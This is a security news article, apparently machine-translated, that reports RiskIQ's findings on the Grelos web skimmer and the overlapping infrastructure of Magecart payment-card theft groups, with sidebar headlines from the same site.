Friday, January 15, 11:14
Home security Skimmer Grelos shows the difficulty of detecting Magecart attacks

Skimmer Grelos shows the difficulty of detecting Magecart attacks

The discovery of a new variant of skimmer - the Grelos - reveals the difficulties associated with locating various Magecart campaigns.

On Wednesday, RiskIQ researchers described how a new Skimmer Grelos showed "increased overlap" in Magecart infrastructure and teams, with this malware - along with other forms of skimmer - now hosted on domain infrastructure used by many groups or affiliates through WHOIS subscriptions, well-known e-fishing campaigns (Phishing) and the development of other malicious programs, creating "associations" that may be difficult to separate.

Magecart is a term used to describe information theft and threat campaigns with agents specializing in the theft of payment card data from e-commerce sites.

Several years ago, well-known brands such as British Airways and Ticketmaster became the first major victims of this form of attack and since then, countless sites have fallen victim to the same technique.

The new version of Grelos skimmer, malware that has been around since at least 2015 and is associated with the Magecart 1 and 2 teams, looks like a separate strain described by researcher @AffableKraut in July. This variant is a WebSocket-based skimmer that uses base64 to hide them activities of.

"We believe that this skimmer is not directly related to the activity of Group 1-2 from 2015-16, but instead it is a repetition one of their code ", says RiskIQ. "This version of the skimmer has a 'loader stage' and a 'skimmer stage' - both of which have a fivefold base64 encoding."

After a Magecart attack on Boom! Mobile, RiskIQ investigated the attack, in which the Fullz House team charged maliciously JavaScript to the mobile network provider to "cater" to customer data.

The domains used in this cyber attack led the team to a cookie and related skimmer sites, including facebookapimanager [.] Com and googleapimanager [.] Com.

However, instead of finding the Skimmer Fullz House, researchers discovered a new skimmer variant, the Grelos. This strain has a similar loader stage with base64 encoding, but has only one coding level, duplicates script tags, spelling mistakes and includes a dictionary called "translate" which contains phrases used by fake forms payment created by malware. Web sockets are still used for data exfiltration.

RiskIQ has noticed several new skimmer variations associated with Magecart in recent years. The company says the Fullz House skimmer has been chosen by others hacking groups, even utilizing some of the same infrastructure - such as hosting providers - to host other skimmers, including Grelos, which also shares IPs with the Inter skimmer.

This, in turn, creates a "murkiness" in monitoring the activities of individual Magecart teams, many of which are actively launching new attacks against companies. e-commerce on a daily basis.


Please enter your comment!
Please enter your name here

Teo Ehc
Be the limited edition.


Nintendo rules out Game & Watch video hacking

Two copyright claims against a YouTuber have been filed by Nintendo, for a video showing hacking of Super Mario ...

The number of reported CVEs increased by 6%!

According to a new analysis released on the level and volume of vulnerabilities in 2020, the total number of CVEs ...

Google: Removed 164 apps that featured out-of-context ads

Google removed 164 Android applications from the official Play Store, after security researchers discovered that the specific apps were bombarding them ...

Britain: Loss of 150.000 police records from a database

Some 150.000 police records have been deleted from its database as a result of a technical problem, according to the British government.

Hy-Vee: Data breach settlement proposed

The Iowa-based Hy-Vee grocery chain appears to be in the process of settling a data breach.

Why do scientists say AI hyperintelligence cannot be controlled?

AI artificial intelligence, which has come to overturn the data of humanity, has been the subject of debate for many decades. Now,...

iPhone vs Android: Which is best for you?

The battle between iPhone and Android will last forever. IOS (iPhone OS) and Android are the two ...

Owner of bitcoin exchange service arrested for money laundering

The owner of a Bulgarian bitcoin exchange service was sentenced to prison in the United States, for his involvement in fraud and providing ...

How to boot shortcuts from an Apple Watch Face

IPhone shortcuts help you automate tasks, no matter how simple or complex. But did you know that you can ...